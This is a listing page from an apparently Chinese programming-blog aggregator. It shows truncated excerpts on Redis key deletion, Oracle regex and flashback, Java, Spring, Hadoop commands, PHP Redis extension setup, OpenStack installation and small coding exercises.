             系统: 64位win7, 开发环境:sublime text 2,  go版本: 1.4.1    1.  安装前准备(gcc, gdb, git)        golang在64位系
  • redis批量删除带空格的key bylijinnan redis
    redis批量删除的通常做法: redis-cli keys "blacklist*" | xargs redis-cli del 上面的命令在key的前后没有空格时是可以的,但有空格就不行了: $redis-cli keys "blacklist*" 1) "blacklist:12: [email protected]
  • oracle正则表达式的用法 0624chenhong oracle正则表达式
      方括号表达示 方括号表达式 描述 [[:alnum:]] 字母和数字混合的字符 [[:alpha:]] 字母字符 [[:cntrl:]] 控制字符 [[:digit:]] 数字字符 [[:graph:]] 图像字符 [[:lower:]] 小写字母字符 [[:print:]] 打印字符 [[:punct:]] 标点符号字符 [[:space:]]
  • 2048源码(核心算法有,缺少几个anctionbar,以后补上) 不懂事的小屁孩 2048
    2048游戏基本上有四部分组成, 1:主activity,包含游戏块的16个方格,上面统计分数的模块 2:底下的gridview,监听上下左右的滑动,进行事件处理, 3:每一个卡片,里面的内容很简单,只有一个text,记录显示的数字 4:Actionbar,是游戏用重新开始,设置等功能(这个在底下可以下载的代码里面还没有实现) 写代码的流程 1:设计游戏的布局,基本是两块,上面是分
  • jquery内部链式调用机理 换个号韩国红果果 JavaScriptjquery
    只需要在调用该对象合适(比如下列的setStyles)的方法后让该方法返回该对象(通过this  因为一旦一个函数称为一个对象方法的话那么在这个方法内部this(结合下面的setStyles)指向这个对象) function create(type){ var element=document.createElement(type); //this=element;
  • 你订酒店时的每一次点击 背后都是NoSQL和云计算 蓝儿唯美 NoSQL
    全球最大的在线旅游公司Expedia旗下的酒店预订公司,它运营着89个网站,跨越68个国家,三年前开始实验公有云,以求让客户在预订网站上查询假期酒店时得到更快的信息获取体验。 云端本身是用于驱动网站的部分小功能的,如搜索框的自动推荐功能,还能保证处理Hotels.com服务的季节性需求高峰整体储能。 Hotels.com的首席技术官Thierry Bedos上个月在伦敦参加“2015 Clou
  • java笔记1 a-john java
    1,面向对象程序设计(Object-oriented Propramming,OOP):java就是一种面向对象程序设计。 2,对象:我们将问题空间中的元素及其在解空间中的表示称为“对象”。简单来说,对象是某个类型的实例。比如狗是一个类型,哈士奇可以是狗的一个实例,也就是对象。 3,面向对象程序设计方式的特性:     3.1 万物皆为对象。    
  • C语言 sizeof和strlen之间的那些事 C/C++软件开发求职面试题 必备考点(一) aijuans C/C++求职面试必备考点
            找工作在即,以后决定每天至少写一个知识点,主要是记录,逼迫自己动手、总结加深印象。当然如果能有一言半语让他人收益,后学幸运之至也。如有错误,还希望大家帮忙指出来。感激不尽。        后学保证每个写出来的结果都是自己在电脑上亲自跑过的,咱人笨,以前学的也半吊子。很多时候只能靠运行出来的结果再反过来
  • 程序员写代码时就不要管需求了吗? asia007 程序员不能一味跟需求走
          编程也有2年了,刚开始不懂的什么都跟需求走,需求是怎样就用代码实现就行,也不管这个需求是否合理,是否为较好的用户体验。当然刚开始编程都会这样,但是如果有了2年以上的工作经验的程序员只知道一味写代码,而不在写的过程中思考一下这个需求是否合理,那么,我想这个程序员就只能一辈写敲敲代码了。       我的技术不是很好,但是就不代
  • Activity的四种启动模式 百合不是茶 android栈模式启动Activity的标准模式启动栈顶模式启动单例模式启动
    android界面的操作就是很多个activity之间的切换,启动模式决定启动的activity的生命周期 ;   启动模式xml中配置     <activity android:name=".MainActivity" android:launchMode="standard&quo
  • Spring中@Autowired标签与@Resource标签的区别 bijian1013 javaspring@Resource@Autowired@Qualifier
    Spring不但支持自己定义的@Autowired注解,还支持由JSR-250规范定义的几个注解,如:@Resource、 @PostConstruct及@PreDestroy。   1. @Autowired    @Autowired是Spring 提供的,需导入    Package:org.springframewo
  • Changes Between SOAP 1.1 and SOAP 1.2 sunjing ChangesEnableSOAP 1.1SOAP 1.2
    JAX-WS SOAP Version 1.2 Part 0: Primer (Second Edition) SOAP Version 1.2 Part 1: Messaging Framework (Second Edition) SOAP Version 1.2 Part 2: Adjuncts (Second Edition)   Which style of WSDL
  • 【Hadoop二】Hadoop常用命令 bit1129 hadoop
    以Hadoop运行Hadoop自带的wordcount为例,   hadoop脚本位于/home/hadoop/hadoop-2.5.2/bin/hadoop,需要说明的是,这些命令的使用必须在Hadoop已经运行的情况下才能执行   Hadoop HDFS相关命令  hadoop fs -ls  列出HDFS文件系统的第一级文件和第一级
  • java异常处理(初级) 白糖_ javaDAOspring虚拟机Ajax
    从学习到现在从事java开发一年多了,个人觉得对java只了解皮毛,很多东西都是用到再去慢慢学习,编程真的是一项艺术,要完成一段好的代码,需要懂得很多。 最近项目经理让我负责一个组件开发,框架都由自己搭建,最让我头疼的是异常处理,我看了一些网上的源码,发现他们对异常的处理不是很重视,研究了很久都没有找到很好的解决方案。后来有幸看到一个200W美元的项目部分源码,通过他们对异常处理的解决方案,我终
  • 记录整理-工作问题 braveCS 工作
    1)那位同学还是CSV文件默认Excel打开看不到全部结果。以为是没写进去。同学甲说文件应该不分大小。后来log一下原来是有写进去。只是Excel有行数限制。那位同学进步好快啊。 2)今天同学说写文件的时候提示jvm的内存溢出。我马上反应说那就改一下jvm的内存大小。同学说改用分批处理了。果然想问题还是有局限性。改jvm内存大小只能暂时地解决问题,以后要是写更大的文件还是得改内存。想问题要长远啊
  • org.apache.tools.zip实现文件的压缩和解压,支持中文 bylijinnan apache
    刚开始用java.util.Zip,发现不支持中文(网上有修改的方法,但比较麻烦) 后改用org.apache.tools.zip org.apache.tools.zip的使用网上有更简单的例子 下面的程序根据实际需求,实现了压缩指定目录下指定文件的方法 import java.io.BufferedReader; import java.io.BufferedWrit
  • 读书笔记-4 chengxuyuancsdn 读书笔记
    1、JSTL 核心标签库标签 2、避免SQL注入 3、字符串逆转方法 4、字符串比较compareTo 5、字符串替换replace 6、分拆字符串 1、JSTL 核心标签库标签共有13个, 学习资料:http://www.cnblogs.com/lihuiyy/archive/2012/02/24/2366806.html 功能上分为4类: (1)表达式控制标签:out
  • [物理与电子]半导体教材的一个小问题 comsci 问题
          各种模拟电子和数字电子教材中都有这个词汇-空穴       书中对这个词汇的解释是; 当电子脱离共价键的束缚成为自由电子之后,共价键中就留下一个空位,这个空位叫做空穴       我现在回过头翻大学时候的教材,觉得这个
  • Flashback Database --闪回数据库 daizj oracle闪回数据库
    Flashback 技术是以Undo segment中的内容为基础的, 因此受限于UNDO_RETENTON参数。要使用flashback 的特性,必须启用自动撤销管理表空间。 在Oracle 10g中, Flash back家族分为以下成员: Flashback Database, Flashback Drop,Flashback Query(分Flashback Query,Flashbac
  • 简单排序:插入排序 dieslrae 插入排序
    public void insertSort(int[] array){ int temp; for(int i=1;i<array.length;i++){ temp = array[i]; for(int k=i-1;k>=0;k--)
  • C语言学习六指针小示例、一维数组名含义,定义一个函数输出数组的内容 dcj3sjt126com c
    # include <stdio.h> int main(void) { int * p; //等价于 int *p 也等价于 int* p; int i = 5; char ch = 'A'; //p = 5; //error //p = &ch; //error //p = ch; //error p = &i; //
  • centos下php redis扩展的安装配置3种方法 dcj3sjt126com redis
    方法一 1.下载php redis扩展包  代码如下 复制代码 #wget http://redis.googlecode.com/files/redis-2.4.4.tar.gz 2 tar -zxvf 解压压缩包,cd /扩展包 (进入扩展包然后 运行phpize 一下是我环境中phpize的目录,/usr/local/php/bin/phpize (一定要
  • 线程池(Executors) shuizhaosi888 线程池
    在java类库中,任务执行的主要抽象不是Thread,而是Executor,将任务的提交过程和执行过程解耦 public interface Executor { void execute(Runnable command); }   public class RunMain implements Executor{ @Override pub
  • openstack 快速安装笔记 haoningabc openstack
    前提是要配置好yum源 版本icehouse,操作系统redhat6.5 最简化安装,不要cinder和swift 三个节点 172 control节点keystone glance horizon 173 compute节点nova 173 network节点neutron control /etc/sysctl.conf net.ipv4.ip_forward =
  • 从c面向对象的实现理解c++的对象(二) jimmee C++面向对象虚函数
    1. 类就可以看作一个struct,类的方法,可以理解为通过函数指针的方式实现的,类对象分配内存时,只分配成员变量的,函数指针并不需要分配额外的内存保存地址。 2. c++中类的构造函数,就是进行内存分配(malloc),调用构造函数 3. c++中类的析构函数,就时回收内存(free) 4. c++是基于栈和全局数据分配内存的,如果是一个方法内创建的对象,就直接在栈上分配内存了。 专门在
  • 如何让那个一个div可以拖动 lingfeng520240 html
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml
  • 第10章 高级事件(中) onestopweb 事件
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • 计算两个经纬度之间的距离 roadrunners 计算纬度LBS经度距离
    要解决这个问题的时候,到网上查了很多方案,最后计算出来的都与百度计算出来的有出入。下面这个公式计算出来的距离和百度计算出来的距离是一致的。 /** * * @param longitudeA * 经度A点 * @param latitudeA * 纬度A点 * @param longitudeB *
  • 最具争议的10个Java话题 tomcat_oracle java
    1、Java8已经到来。什么!? Java8 支持lambda。哇哦,RIP Scala!   随着Java8 的发布,出现很多关于新发布的Java8是否有潜力干掉Scala的争论,最终的结论是远远没有那么简单。Java8可能已经在Scala的lambda的包围中突围,但Java并非是函数式编程王位的真正觊觎者。    2、Java 9 即将到来    Oracle早在8月份就发布
  • zoj 3826 Hierarchical Notation(模拟) 阿尔萨斯 rar
    题目链接:zoj 3826 Hierarchical Notation 题目大意:给定一些结构体,结构体有value值和key值,Q次询问,输出每个key值对应的value值。 解题思路:思路很简单,写个类词法的递归函数,每次将key值映射成一个hash值,用map映射每个key的value起始终止位置,预处理完了查询就很简单了。 这题是最后10分钟出的,因为没有考虑value为{}的情
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他